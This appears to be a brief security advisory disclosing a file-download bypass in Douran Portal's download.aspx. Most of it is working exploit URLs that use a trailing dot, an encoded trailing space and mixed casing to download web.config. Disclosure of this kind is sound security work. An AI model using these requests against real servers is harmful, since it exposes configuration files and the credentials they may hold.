- HUrr!c4nE! (bl4ck.k3yv4n [at] yahoo [dot] com) (ajaxtm.com)
- Soroush Dalili (Irsdl [at] yahoo [dot] com) (secproject.com)
Regarding attack technique [1], it is possible to bypass the security protections of
“/download.aspx” in Douran Portal and download the hosted files.
Try this first and see the access denied error:
http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt
Now try these to bypass it:
http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config\.&OriginalAttachFileName=secretfile.txt
http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&OriginalAttachFileName=secretfile.txt
http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt
[1] Unrestricted File Download V1.0 – Windows Server, (URL:
http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)